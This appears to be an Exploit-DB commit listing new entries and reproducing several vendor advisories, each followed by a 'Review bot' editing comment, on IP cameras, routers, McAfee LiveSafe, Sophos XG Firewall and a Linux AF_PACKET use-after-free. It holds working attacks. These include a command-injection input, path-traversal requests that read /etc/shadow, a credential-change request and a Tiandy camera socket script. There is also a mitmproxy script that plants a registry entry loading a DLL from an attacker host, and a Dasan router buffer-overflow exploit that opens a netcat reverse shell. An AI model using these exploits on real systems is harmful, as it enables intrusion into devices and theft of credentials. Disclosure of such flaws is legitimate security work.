DB: 2018-02-16

45 changes to exploits/shellcodes

Cisco ASA - Crash PoC
Cisco ASA - Crash (PoC)

GNU binutils 2.26.1 - Integer Overflow (POC)
GNU binutils 2.26.1 - Integer Overflow (PoC)
K7 Total Security 15.1.0.305 - Device Driver Arbitrary Memory Read
Linux Kernel - 'AF_PACKET' Use-After-Free
Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service
Microsoft Edge Chakra JIT - 'GlobOpt::OptTagChecks' Must Consider IsLoopPrePass Properly (2)
Microsoft Edge Chakra JIT - Memory Corruption
Microsoft Edge Chakra JIT - ImplicitCallFlags Checks Bypass
Microsoft Edge Chakra JIT - Array Type Confusion via InitProto Instructions
Microsoft Edge Chakra JIT - 'Array.prototype.reverse' Array Type Confusion
Microsoft Edge Chakra JIT - 'NewScObjectNoCtor' Array Type Confusion
Microsoft Edge Chakra JIT - 'LdThis' Type Confusion
Pdfium - Pattern Shading Integer Overflows
Pdfium - Out-of-Bounds Read with Shading Pattern Backed by Pattern Colorspace
Chrome V8 - 'Runtime_RegExpReplace' Integer Overflow
Hotspot Shield - Information Disclosure
Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation
Nitro Pro PDF - Multiple Vulnerabilities
Odoo CRM 10.0 - Code Execution
Dashlane - DLL Hijacking

LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation
Trustwave SWG 11.8.0.27 - SSH Unauthorized Access
Ichano AtHome IP Cameras - Multiple Vulnerabilities
Cisco UCS Platform Emulator 3.1(2ePE1) - Remote Code Execution
Ikraus Anti Virus 2.16.7 - Remote Code Execution
McAfee Security Scan Plus - Remote Command Execution
OrientDB - Code Execution
360 Total Security - Local Privilege Escalation
HPE Intelligent Management Center (iMC) 7.2 (E0403P10) - Code Execution
Oracle Knowledge Management 12.1.1 < 12.2.5 - XML External Entity Leading To Remote Code Execution
iBall WRA150N - Multiple Vulnerabilities
GitStack - Unauthenticated Remote Code Execution
Monstra CMS - Remote Code Execution
Ametys CMS 4.0.2 - Unauthenticated Password Reset
DblTek - Multiple Vulnerabilities
FiberHome - Directory Traversal
PHP Melody 2.7.3 - Multiple Vulnerabilities
Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure
Horde Groupware 5.2.21 - Unauthorized File Download
QNAP HelpDesk < 1.1.12 - SQL Injection
Hanbanggaoke IP Camera - Arbitrary Password Change
McAfee LiveSafe 16.0.3 - Man In The Middle Registry Modification Leading to Remote Command Execution
Sophos XG Firewall 16.05.4 MR-4 - Path Traversal
Cisco DPC3928 Router - Arbitrary File Disclosure
IDERA Uptime Monitor 7.8 - Multiple Vulnerabilities
Geneko Routers - Unauthenticated Path Traversal
Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
Commit e630f8c249 (parent 15ecd79646), Offensive Security, 2018-02-16 05:01:50 +00:00
46 changed files with 5949 additions and 385 deletions


@ -0,0 +1,37 @@
## Vulnerabilities Summary
The following advisory describes three (3) vulnerabilities found in Ichano IP Cameras.
AtHome Camera is “a remote video surveillance app which turns your personal computer, smart TV/set-top box, smart phone, and tablet into a professional video monitoring system in a minute.”
The vulnerabilities found are:
Hard-coded username and password telnet
Hard-coded username and password Web server
Unauthenticated Remote Code Execution
## Credit
An independent security researcher, Tim Carrington, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
We tried to contact Ichano since November 21st 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities.
CVE: CVE-2017-17761
## Vulnerabilities details
Hard-coded username and password telnet
The device runs a telnet server at startup with a default password of 123.
Hard-coded username and password Web server
In /app/www/doc/script/login.js, in the function DoLogin(), client side validation is used to login a user:
```
if($("#UserName").val()=="super_yg"){jumpPage();return}
```
A user can login with these credentials and can then take control of the device over http:
Unauthenticated Remote Code Execution
The device runs “noodles” binary a service on port 1300 that allows a remote (LAN) unauthenticated user to run arbitrary commands.
The binary has a set of commands he can run if a user will use the following “protocol”, command to be run is enclosed like html tags, i.e. <system>id</system>, a successful execution results in <system_ack>ok</system_ack>.
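Review bot: the 'Hard-coded username and password telnet' section states only a password ('default password of 123') and no username, so it does not support its own heading; add the account name or retitle it 'Hard-coded telnet password'. The line 'A user can login with these credentials and can then take control of the device over http:' ends in a colon with nothing after it, which suggests a screenshot that did not survive the conversion to markdown; either drop the colon or describe what the image showed. The three sub-section titles ('Hard-coded username and password telnet', 'Hard-coded username and password Web server', 'Unauthenticated Remote Code Execution') are plain text here while the sibling files in this commit use '##' headings for the same level.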


@ -0,0 +1,40 @@
## Vulnerabilities summary
The following advisory describes two (2) vulnerabilities found in iB-WRA150N devices, firmware 1.2.6 build 110401 Rel.47776n.
iB-WRA150N is “a powerful solution to Internet connectivity at home, small offices and work stations. The key is if you are using an ADSL2+ connection now and later decide to change to Broadband or vice-versa you dont need to change your router. This iBall router is 2-in-1 and compatible to both Broadband connection as well as ADSL2 connection (Telephone connection or cable operator connection). ”
The vulnerabilities found are:
Hard coded accounts
Remote command execution
## Credit
An independent security researcher, maxki4x, has reported this vulnerabilities to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
We tried to contact iBall since December 20 2017, repeated attempts to establish contact were answered, but no details have been provided on a solution or a workaround.
CVE: CVE-2018-6388
## Vulnerabilities details
Hard coded accounts
Username: admin
Password: admin
Username: support
Password: support
Username: user
Password: user
## Remote command execution
After we logged in to the victims router using the hard coded accounts, we can trigger the second vulnerability and achieve remote command execution.
User controlled input is not sufficiently filtered, allowing user to inject arbitrary commands into ping test arguments in Diagnostics page.
By entering the following input in the ping test arguments in Diagnostics page, the attacker can get the /etc/passwd file:
```
127.0.0.1;cat/etc/passwd
```
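Review bot: the sub-section headings under 'Vulnerabilities details' are inconsistent: 'Hard coded accounts' is plain text while 'Remote command execution' is a '##' heading, which promotes it to a sibling of 'Vulnerabilities details' instead of a child. Under 'Vendor response', 'repeated attempts to establish contact were answered, but no details have been provided' reads as a contradiction (the same template sentence in the other advisories says 'went unanswered'); confirm whether iBall actually replied and state that plainly. 'has reported this vulnerabilities' should be 'these vulnerabilities'.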


@ -0,0 +1,48 @@
## Vulnerability Summary
The following advisory describes sensitive information Disclosure found in Tiandy IP cameras version 5.56.17.120
Tianjin Tiandy Digital Technology Co., Ltd ( Tiandy Tech) is “one of top 10 leading CCTV manufacturer in China and a global supplier of advanced video surveillance solutions.”
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
We tried to contact Tiandy starting from August 16 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for this vulnerability.
CVE: CVE-2017-15236
## Vulnerability details
Tiandy uses a proprietary protocol, a flaw in the protocol allows an attacker to forge a request that will return configuration settings of the Tiandy IP camera.
## Proof of Concept
By sending the following request, an attacker can download the following files:
``
config_server.ini
extendword.txt
config_ptz.dat
config_right.dat
config_dg.dat
config_burn.dat
```
## POC.PY
```
import socket
ip = '192.168.1.1'
data1 = '\x74\x1f\x4a\x84\xc8\xa8\xe4\xb3\x18\x7f\xd2\x21\x08\x00\x45\x00\x00\xcc\x3e\x9a\x40\x00\x40\x06\xd4\x13\xac\x10\x65\x75\x6e\x31\xa7\xc7\x43\x5b\x0b\xb9\x85\xbc\x1d\xf0\x5b\x3e\xe8\x32\x50' +
'\x18\x7f\xa4\xc6\xcf\x00\x00\xf1\xf5\xea\xf5\x74\x00\xa4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x00' + ip +
'\x09\x50\x52\x4f\x58\x59\x09\x43\x4d\x44\x09\x44\x48\x09\x43\x46\x47\x46\x49\x4c\x45\x09\x44\x4f\x57\x4e\x4c\x4f\x41\x44\x09\x36\x09\x63\x6f\x6e\x66\x69\x67\x5f\x73\x65\x72\x76\x65\x72\x2e' +
'\x69\x6e\x69\x09\x65\x78\x74\x65\x6e\x64\x77\x6f\x72\x64\x2e\x74\x78\x74\x09\x63\x6f\x6e\x66\x69\x67\x5f\x70\x74\x7a\x2e\x64\x61\x74\x09\x63\x6f\x6e\x66\x69\x67\x5f\x72\x69\x67\x68\x74\x2e' +
'\x64\x61\x74\x09\x63\x6f\x6e\x66\x69\x67\x5f\x64\x67\x2e\x64\x61\x74\x09\x63\x6f\x6e\x66\x69\x67\x5f\x62\x75\x72\x6e\x2e\x64\x61\x74\x0a\x0a\x0a'
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,3001))
s.send(data1)
while True:
buf = s.recv(64)
if not len(buf):
break
print buf
```
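Review bot: the opening fence before the file list ('config_server.ini' through 'config_burn.dat') is two backticks instead of three, so it does not pair with the closing '```' and the list together with the '## POC.PY' heading will render as an unterminated inline code span. Separately, the first 54 bytes of data1 in POC.PY look like an Ethernet, IPv4 and TCP header lifted from a packet capture rather than application data: '\x08\x00' sits in the ethertype position, '\x45\x00' is the IPv4 version/IHL byte, and '\x0b\xb9' (3001) is where the TCP destination port falls. Written to a SOCK_STREAM socket those bytes become part of the payload the camera receives, so the script should be re-checked against a working run before it is published as the PoC. 'print buf' also marks this as Python 2; a shebang or note would tell readers which interpreter to use.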


@ -0,0 +1,49 @@
## Vulnerability summary
The following advisory describes an arbitrary password change vulnerability found in Hanbanggaoke webcams.
Beijing Hanbang Technology, “one of the first enterprises entering into digital video surveillance industry, has been focusing on R&D of products and technology of digital video surveillance field. While providing product and technical support, it also provides overall solution for the industrial system; it has successfully provided system implementation and service supports for several industries.”
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
Vendor response
We tried to contact Hanbanggaoke since the 8th of August 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for this vulnerability.
## Vulnerability details
User controlled input is not sufficiently sanitized, by sending a PUT request to /ISAPI/Security/users/1 HTTP/1.1 an attacker can change the admin password.
CVE: CVE-2017-14335
## Proof of Concept
In order to exploit the vulnerability, we need to use proxy tool (like Burp). We then connect to the victims machine and need to capture the data package.
We then edit the data of the following PUT request:
```
PUT /ISAPI/Security/users/1 HTTP/1.1
Host: x.x.x.x
Content-Length: 321
Cache-Control: max-age=0
Origin: http://x.x.x.x
X-Requested-With: XMLHttpRequest
Authorization: Basic YWRtaW46ODg4ODg4
Content-Type: application/x-www-form-urlencoded
Accept: application/xml, text/xml, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
If-Modified-Since: 0
Referer: http://x.x.x.x/doc/page/paramconfig.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: updateTips=true; streamType=0; BufferLever=1; userInfo80=YWRtaW46ODg4ODg4; DevID=5; language=zh; curpage=paramconfig.asp%254
Connection: close
<?xml version="1.0" encoding="UTF-8"?><User><id>1</id><userName>admin</userName><password>admin</password><bondIpList><bondIp><id>1</id><ipAddress>0.0.0.0</ipAddress><ipv6Address>::</ipv6Address></bondIp></bondIpList><macAddress/><userLevel>administrator</userLevel><attribute><inherent>true</inherent></attribute></User>
```
The successful response will be:
Now, we can login with as administrator:
User: admin
Password: admin
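Review bot: the sample request carries 'Authorization: Basic YWRtaW46ODg4ODg4' and a 'userInfo80=' cookie, so as written the password change is submitted with credentials; 'Vulnerability details' should say whether the PUT to /ISAPI/Security/users/1 is accepted without them, because that is what makes this an arbitrary password change rather than an authenticated one. Also 'The successful response will be:' is followed by nothing (the response or screenshot is missing), 'Vendor response' lacks the '##' the other headings carry, and the CVE line sits under 'Vulnerability details' while every other file in this commit places it after the vendor response.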


@ -0,0 +1,119 @@
## Vulnerabilities Summary
The following advisory describes a Remote Command Execution found in McAfee McAfee LiveSafe (MLS) versions prior to 16.0.3. The vulnerability allows network attackers to modify the Windows registry value associated with the McAfee update via the HTTP backend-response.
McAfee Security Scan Plus is a free diagnostic tool that ensures you are protected from threats by actively checking your computer for up-to-date anti-virus, firewall, and web security software. It also scans for threats in any open programs.
## Credit
An independent security research company, Silent Signal, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
The vendor has released patches to address this vulnerability.
For more information: https://service.mcafee.com/webcenter/portal/cp/home/articleview?articleId=TS102714
CVE: CVE-2017-3898
## Vulnerabilities Details
An active network attacker can achieve remote code execution in multiple McAfee products. Affected products retrieve configuration data over plaintext HTTP channel from the http://COUNTRY.mcafee.com/apps/msc/webupdates/mscconfig.asp URL (where COUNTRY is a two letter country identifier, e.g. “uk”).
The response body contains XML formatted data, similar to the following:
```
<webservice-response response-version="1.0" frequency="168"
verid="1#1316#15#0#2">
<update>
<reg key="HKLM\SOFTWARE\McAfee\MSC\Settings\InProductTransaction"
name="enable" type="REG_DWORD" value="1" obfuscate="0"/>
</update>
</webservice-response>
```
The response describes a Registry modification with the reg tags under the webservice-response/update path.
This request and subsequent update is triggered automatically, first upon the installation of the software then after the number of hours indicated by the frequency attribute of the webservice-request node (168 minutes by default).
The update is executed by the PlatformServiceFW.dll of the McSvHost.exe process by invoking the mcsvrcnt.exe program with the /update argument. The McSvHost.exe process is running with SYSTEM privileges that is inherited by mcsvrcnt.exe that implements the Registry change.
As a result active network attackers can modify the server responses to write the Registry of the target with SYSTEM privileges.
## Proof of Concept
The exploit runs as a proxy that intercepts and modifies plaintext HTTP requests and responses. Since the target software performs certificate validation for HTTPS services its important to let these connections pass through without modification.
In regular HTTP proxy mode this can be achieved by using the --ignore command line parameter of mitmproxy:
```
mitmproxy -s mcreggeli_inline.py --ignore '.*'
```
In case of transparent proxy mode the above parameter should not be provided:
```
mitmproxy -s mreggeli_inline.py T
```
For transparent proxy mode the following commands configure NAT and port redirection on common Debian-based Linux distributions (eth0 is the interface visible to the target, eth1 is connected to the internet):
```
iptables -t nat -A PREROUTING -i eth0 -p tcp \
--dport 80 -j REDIRECT --to 8080
iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
sysctl net.ipv4.ip_forward=1
```
The script looks for the “mscconfig.asp” string in the request URL. If found the XML response body is deserialized, and new reg nodes are added based on the REG variable declared at the beginning of the script. The REG variable is a list of dictionaries, each dictionary containing the following keys:
Key The name of the Registry key to modify (e.g. “HKLM\SYSTEM\CurrentControlSet\Services\mfevtp”, backslashes should be escaped properly for Python)
Type Type of the value to create (e.g. “REG_SZ” for strings)
Name Name of the value to create
Value Value to be created
The exploit also changes the frequency attribute to 1 so re-exploitation can be performed in shorter time (in 1 hour) if needed. After the new nodes are inserted, the resulting object is serialized and put in place of the original response body.
To demonstrate code execution one of the own service entries of the affected McAfee products (mfevtp McAfee Process Validation Service) was overwritten: the ImagePath value of the HKLM\SYSTEM\CurrentControlSet\Services\mfevtp key was replaced to point the built-in rundll32.exe with an UNC path argument pointing to the attacker host (The payload (test.dll) was served with Metasploits smb_delivery module during testing):
The REG variable was declared like the following:
```
REG=[{"key":"HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp", "type":"REG_SZ","name":"ImagePath", "value":"c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0"},]
```
In this way SYSTEM level command execution is triggered after the machine is restarted, the exploit was not caught by the McAfee software.
mcreggeli_inline.py
```
#!/usr/bin/env python3
#
# HTTP proxy mode:
# mitmproxy -s mcreggeli_inline.py --ignore '.*'
#
# Transparent proxy mode:
# mitmproxy -s mcreggeli_inline.py -T --host
#
from mitmproxy import ctx, http
from lxml import etree
REG=[{"key":"HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp","type":"REG_SZ","name":"ImagePath","value":"c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0"},]
def response(flow):
if flow.request.scheme == "http" and "mscconfig.asp" in flow.request.url:
try:
oxml=etree.XML(flow.response.content)
oxml.set("frequency","1")
update=oxml.xpath("//webservice-response/update")[0]
for r in REG:
reg=etree.SubElement(update,"reg")
reg.set("key", r["key"])
reg.set("type", r["type"])
reg.set("obfuscate", "0")
reg.set("name", r["name"])
reg.set("value", r["value"])
#ctx.log(etree.tostring(oxml))
flow.response.content=etree.tostring(oxml)
ctx.log("[+] [MCREGGELI] Payload sent")
except etree.XMLSyntaxError:
ctx.log("[-] [MCREGGELI] XML deserialization error")
```
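Review bot: the frequency description contradicts itself: 'after the number of hours indicated by the frequency attribute ... (168 minutes by default)'; with frequency="168" in the sample response the unit must be hours (one week), and the later sentence 'so re-exploitation can be performed in shorter time (in 1 hour)' also assumes hours. The transparent-mode command 'mitmproxy -s mreggeli_inline.py T' disagrees with the script's own header comment twice: the filename is misspelled (it is mcreggeli_inline.py everywhere else) and the flag is given as 'T' where the script comment says '-T --host'. Minor: 'McAfee McAfee LiveSafe' repeats the vendor name, and the second paragraph describes McAfee Security Scan Plus although the title and summary name LiveSafe; list the affected products in one place.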


@ -0,0 +1,75 @@
## Vulnerabilities Summary
The following advisory describe two (2) vulnerabilities, a Path Traversal and a Missing Function Level Access Control, in Sophos XG Firewall 16.05.4 MR-4.
Sophos XG Firewall provides “unprecedented visibility into your network, users, and applications directly from the all-new control center. You also get rich on-box reporting and the option to add Sophos iView for centralized reporting across multiple firewalls”.
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
The vendor has released patches to address this vulnerability:
“The patches were released as part of SFOS 16.05.5 MR5:
https://community.sophos.com/products/xg-firewall/b/xg-blog/posts/sfos-16-05-5-mr5-released
Our internal bug number was NC-18958, mentioned in the changelog”
CVE: CVE-2017-12854
## Vulnerabilities Details
The Sophos XG Firewall hosts 2 different web portals. The first is the web administration portal used to manage the firewall (Sophos XG Fireweal portal), the second is the “User Portal” used to unprivileged user to access to a restricted group of function like to trace their traffic quotas, to see SMTP quarantined mail and to download authentication client.
The appliance has a web download function in Sophos XG Fireweal portal to allow downloading of a range of file like, logs and certificate keys.
Crafting the download request and adding a path traversal vector to it, an authenticated user, can use this function to download files that are outside the normal scope of the download feature (including sensitive files).
In addition, the function can be called from a low privileged user, a user that is logged on to the User Portal (i.e. Missing Function Level Access Control), a combinations of these two vulnerabilities can be used to compromise the integrity of the server, by allowing a User Portal to elevate his privileges.
## Proof of Concept
Log in the Sophos XG Firewall admin portal
Using developer tools of Firefox (F12) or analyzing the html code of the loaded page (Cyberoam.c$rFt0k3n parameter), extract the csrf code.
Open the Hackbar or use other tools to send a new crafted request:
```
URL https://192.168.0.188:4444/webconsole/Controller?filename=../../../etc/passwd&mode=4010
postdata csrf=<== THE PARAMETER YOU HAVE FOUND ==>
referrer https://192.168.0.188:4444/webconsole/webpages/index.jsp
```
This will start the download of the /etc/passwd file:
Create from the admin portal an user of the User Portal (Authentication > User > Add)
Login in the User Portal using the new user
Using developer tools of Firefox or analyzing the html code of the loaded page (Cyberoam.c$rFt0k3n parameter), extract the csrf code.
Open the hack bar or use other tools to send a new crafted request:
```
URL https://192.168.0.188/userportal/Controller?filename=../../../etc/passwd&mode=4010&json=%7B%22lang%22%3A%220%22%7D
postdata csrf=<== THE PARAMETER YOU HAVE FOUND ==>
referrer https://192.168.0.188/userportal/webpages/myaccount/index.jsp
```
This will start the download
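Review bot: the Proof of Concept is a sequence of steps (log in, extract the CSRF token, send the request, create a User Portal user, log in again, send the second request) but is written as bare lines, so the admin-portal flow and the User Portal flow are hard to tell apart; numbering them as a list would also mark where the screenshots referenced by 'This will start the download of the /etc/passwd file:' and the trailing 'This will start the download' were meant to sit. Spelling and grammar: 'Fireweal' appears twice for 'Firewall', 'The following advisory describe' should be 'describes', and 'allowing a User Portal to elevate his privileges' should read 'a User Portal user'.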


@ -0,0 +1,46 @@
## Vulnerability Summary
The following advisory describes an arbitrary file disclosure vulnerability found in Cisco DPC3928AD DOCSIS 3.0 2-PORT Voice Gateway.
The Cisco DPC3928AD DOCSIS is a home wireless router that is currently "Out of support" but is provided by ISPs world wide.
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
We reported the vulnerability to Cisco and they informed us that the Cisco DPC3928AD sold to Technicolor: “The Cisco DPC3928AD was actually sold to Technicolor a while back. In this case, we will ask you to please contact Technicolor at security@technicolor.com to open a case with them”
After connecting Technicolor, they informed us that the product has reached end of life and they will not patch the vulnerability: “After an extensive search for the product to perform validation, we were unable to source the gateway to validate your proof of concept. Due to the end-of-sale and end-of-life of the product Technicolor will not be patching the bug.”
CVE: CVE-2017-11502
## Vulnerability details
Cisco DPC3928AD DOCSIS 3.0 2-PORT Voice Gateway vulnerability is present on its TCP/4321 port .
## Proof of Concept
An attacker can get the /etc/passwd file from the remote device, by sending the following request:
```
GET /../../../../../../../../../../../../../../../../etc/passwd
HTTP/1.1
Host: 192.168.0.10:4321
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
```
The Router response the next output with the passwd content:
```
HTTP/1.1 200 OK
Content-Type: text/html
SERVER: Linux/#2 Wed Nov 12 10:23:46 CST 2014 UPnP/1.0 Broadcom
UPNP/0.9
Content-Length: 247
Accept-Ranges: bytes
Date: Thu, 10 Nov 2016 16:01:04 GMT
root:HAdbdMWcXHOuKQ:0:0:root:/:/bin/sh
admin:KASJakljhHqiuJ:0:0:aDMINISTRATOR:/:/bin/false
```
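Review bot: the request in the PoC is broken across two lines ('GET /../../.../etc/passwd' and then 'HTTP/1.1' on its own line); an HTTP request line must be a single line, so this looks like a wrap introduced when the file was prepared and should be joined so readers do not copy a malformed request. 'Vulnerability details' is a single sentence ('... vulnerability is present on its TCP/4321 port .') that does not say what listens there; the response header 'SERVER: Linux/#2 ... UPnP/1.0 Broadcom UPNP/0.9' shows it is the Broadcom UPnP service, which is worth stating since that is the service an administrator would disable or filter. Also 'After connecting Technicolor' should be 'contacting', and 'The Router response the next output' should be 'The router responds with'.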


@ -0,0 +1,70 @@
## Vulnerability Summary
The following advisory describes a Unauthenticated Path Traversal vulnerability found in Geneko GWR routers series.
Geneko GWG is compact and cost effective communications solution that provides cellular capabilities for fixed and mobile applications such as data acquisition, smart metering, remote monitoring and management. GWG supports a variety of radio bands options on 2G, 3G and 4G cellular technologies.
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
We have informed Geneko of the vulnerability on the 28th of May 2017, the last email we received from them was on the 7th of June 2017. We have no further updates from Geneko regarding the availability of a patch or a workaround for the vulnerability.
CVE: CVE-2017-11456
## Vulnerability Details
User controlled input is not sufficiently sanitized, and then passed to a function responsible for accessing the filesystem. Successful exploitation of this vulnerability enables a remote unauthenticated user to read the content of any file existing on the host, this includes files located outside of the web root folder.
By sending the following GET request, You get direct access to the configuration file, which allows you to log in to the login panel:
```
GET /../../../../../../../../../../../../mnt/flash/params/j_admin_admin.params HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Connection: close
Upgrade-Insecure-Requests: 1
```
## Router response:
```
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 121
{"enable":true,"username":"admin","password”:"xxx!","web_access":0,"http_port":80,"https_port":443,"gui_timeout":15}
In this case, the admin user is configured to have access to the shell (SSH Access) as can be seen in the /etc/passwd
admin:x:0:0:root:/root:/root/cli
```
## Proof of Concept
path_traversal.py
```
import requests
import sys
domain = sys.argv[1]
r = requests.get("http://"+domain+"/../../../../../etc/shadow")
print r.content
```
The router then will response with:
```
root:$1$ryjw5yTs$xoQlzavABZ5c7gQuD7jKO0:10933:0:99999:7:::
bin:*:10933:0:99999:7:::
daemon:*:10933:0:99999:7:::
adm:*:10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody:*:10933:0:99999:7:::
admin:$1$72G6z9YF$cs5dS2elxOD3qicUTlEHO/:10933:0:99999:7:::
```
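Review bot: the code block under 'Router response:' mixes three things: the HTTP response, a prose sentence ('In this case, the admin user is configured to have access to the shell ...'), and an /etc/passwd line that is not part of that response; move the sentence out of the fence and give the passwd line its own block. The JSON body also contains a typographic closing quote ('"password”:') where a straight quote belongs, which breaks the line for anyone pasting it into a parser. In path_traversal.py, 'print r.content' is Python 2 syntax; a shebang or a note would tell readers which interpreter to use.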


@ -0,0 +1,82 @@
## Vulnerability Summary
The following advisory describes a buffer overflow that leads to remote code execution found in Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146
Dasan Networks GPON ONT WiFi Router “is indoor type ONT dedicated for FTTH (Fibre to the Home) or FTTP (Fiber to the Premises) deployments. That can work as simple Bridge or behave as Router/NAT. Its cost-effective CPE that meets carrier-class requirement for Telcom industry and guarantee reliable service proven in the field.”
## Credit
An independent security researcher, TigerPuma (at) Fosec.vn, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
We tried to contact Dasan since October 8 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for this vulnerability.
## Vulnerability details
All cgi in Dasan web service are symbolic link of cgipage.cgi, and when client request, lighttpd will invoke the corresponding path.
The buffer overflow vulnerability found in function login_action which handler login request.
The function uses strcpy without check length of input from client request.
If we will look at the stack, we can see that we can trigger the buffer overflow and in the end to control the pc.
## Proof of Concept
```
import sys
import socket
import json
import time
import struct
import ssl
if len(sys.argv) != 4:
print "Use: {} ip port connectback".format(sys.argv[0])
sys.exit(1)
host = str(sys.argv[1])
port = int(sys.argv[2])
connectback = str(sys.argv[3])
buf = 1024
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#sock.settimeout(10)
clientsocket = ssl.wrap_socket(sock)
#clientsocket = sock
clientsocket.connect((host, port))
addr_libc = 0x2ad0c000 # 0x2ad0e000 with H640DW
# rop1
rop1 = addr_libc + 0x00115d40 #addiu $a0,$sp,0x18 | jalr $s0
addr_rop1 = struct.pack(">i",rop1)
#rop2
system = addr_libc + 0x0003CC9C #system
addr_system = struct.pack(">i",system)
# execute command
command = "nc " + connectback + " -e /bin/sh;"
payload = "A"*(756 - 0x28) + addr_system + 'C'*(0x28-8) + addr_rop1 + ';'*24 + command
data = "action={}&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n".format(payload)
http_payload = """POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: {}\r\n\r\n{}""".format(len(data),data)
print http_payload
clientsocket.send(http_payload)
respond_raw = clientsocket.recv(buf).strip()
print respond_raw
respond_raw = clientsocket.recv(buf).strip()
print respond_raw
respond_raw = clientsocket.recv(buf).strip()
print respond_raw
clientsocket.close()
```
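Review bot: the title lists three firmware versions but the PoC hard-codes a single libc base ('addr_libc = 0x2ad0c000 # 0x2ad0e000 with H640DW'), and nothing in 'Vulnerability details' says which version the offsets were validated against; state that so readers do not treat the PoC as applying to all three. In http_payload the 'Host: 192.168.1.100:8080' and 'Referer: https://192.168.1.100:8080/...' headers are fixed even though host and port are read from argv ('host = str(sys.argv[1])', 'port = int(sys.argv[2])'), which is inconsistent. The prose needs a grammar pass: 'All cgi in Dasan web service are symbolic link of cgipage.cgi', 'which handler login request', 'without check length of input'.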

exploits/linux/dos/44053.md

@ -0,0 +1,306 @@
## Vulnerabilities summary
The following advisory describes a use-after-free vulnerability found in Linux Kernels implementation of AF_PACKET that can lead to privilege escalation.
AF_PACKET sockets “allow users to send or receive packets on the device driver level. This for example lets them to implement their own protocol on top of the physical layer or to sniff packets including Ethernet and higher levels protocol headers”
## Credit
The vulnerability was discovered by an independent security researcher which reported this vulnerabilities to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
Update 1
CVE: CVE-2017-15649
“It is quite likely that this is already fixed by:
packet: hold bind lock when rebinding to fanout hook http://patchwork.ozlabs.org/patch/813945/
Also relevant, but not yet merged is
packet: in packet_do_bind, test fanout with bind_lock held http://patchwork.ozlabs.org/patch/818726/
We verified that this does not trigger on v4.14-rc2, but does trigger when reverting that first mentioned commit (008ba2a13f2d).”
## Vulnerabilities details
This use-after-free is due to a race condition between fanout_add (from setsockopt) and bind on a AF_PACKET socket.
The race will cause __unregister_prot_hook() from packet_do_bind() to set po->running to 0 even though a packet_fanout has been created from fanout_add().
This allows us to bypass the check in unregister_prot_hook() from packet_release() effectively causing the packet_fanout to be released and still being referenced from the packet_type linked list.
## Crash Proof of Concept
``
// Please note, to have KASAN report the UAF, you need to enable it when compiling the kernel.
// the kernel config is provided too.
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <pthread.h>
#include <sys/utsname.h>
#include <sched.h>
#include <stdarg.h>
#include <stdbool.h>
#include <sys/stat.h>
#include <fcntl.h>
#define IS_ERR(c, s) { if (c) perror(s); }
struct sockaddr_ll {
unsigned short sll_family;
